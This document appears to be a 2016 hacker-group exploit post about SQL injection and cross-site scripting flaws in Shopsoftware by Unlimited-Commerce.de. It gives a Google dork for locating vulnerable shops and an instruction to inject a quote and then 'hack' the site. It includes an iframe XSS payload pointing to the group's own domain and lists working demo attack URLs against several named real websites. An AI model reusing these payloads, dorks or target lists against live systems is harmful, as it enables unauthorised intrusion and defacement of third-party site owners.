* Title: Shopsoftware by Unlimited-Commerce.de Multiple Vulnerability * date: 28/4/2016 * Exploit Author : Guardiran Security Team * Website: guardiran.org * Google Dork: intext:"Shopsoftware 2009-2010 by Unlimited-Commerce.de" * Vendor Homepage: http://www.unlimited-commerce.de/ * Version : All Version * Tested On : Kali Linux / Windows 8.1 HEllo Guys. This Is a Multiple Vulnerability ( Xss & Sqli ) ------------------ SQL INJECTION : insert " or ' After PATCH URL To Give The MYSQL Error. Then You Can User The Command SQL Injection To Inject Website And Hack It. Demo : http://durchfahrt.de/cms_pages.php?pn=Datenschutz%27 http://www.adels-archiv.com/shop/showcatrows.php?CategoryID=2&SubcategoryID=5%27 http://media.starclubmusic.de/showcatrows.php?CategoryID=12&SubcategoryID=13%27 XSS: This CMS And Also Have Xss Vulnerability. We Cnd Run Our Javacode In site. Payload: '><iframe src="http://guardiran.org" width="450" height="200"></iframe> Demo: http://durchfahrt.de/cms_pages.php?pn=Datenschutz%27%3E%3Ciframe%20src=%22http://guardiran.org%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E http://www.download-by-zet.de/cms_pages.php?pn=Widerrufsbelehrung%27%3E%3Ciframe%20src=%22http://guardiran.org%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E http://media.starclubmusic.de/showcatrows.php?CategoryID=12&SubcategoryID=13%27%3E%3Ciframe%20src=%22http://guardiran.org%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E http://www.adels-archiv.com/shop/showcatrows.php?CategoryID=2&SubcategoryID=5%27%3E%3Ciframe%20src=%22http://guardiran.org%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E * Special Tnx : cod3!nj3ct!0n , REX , alizombie , DR.GrYgHoN , MR.IMAN , reza attacker * Discovered By : MR.IMAN ~~ demon.hacker37@yahoo.com ~~ telegram.me/MRBLACK * We Are Guardiran Security Team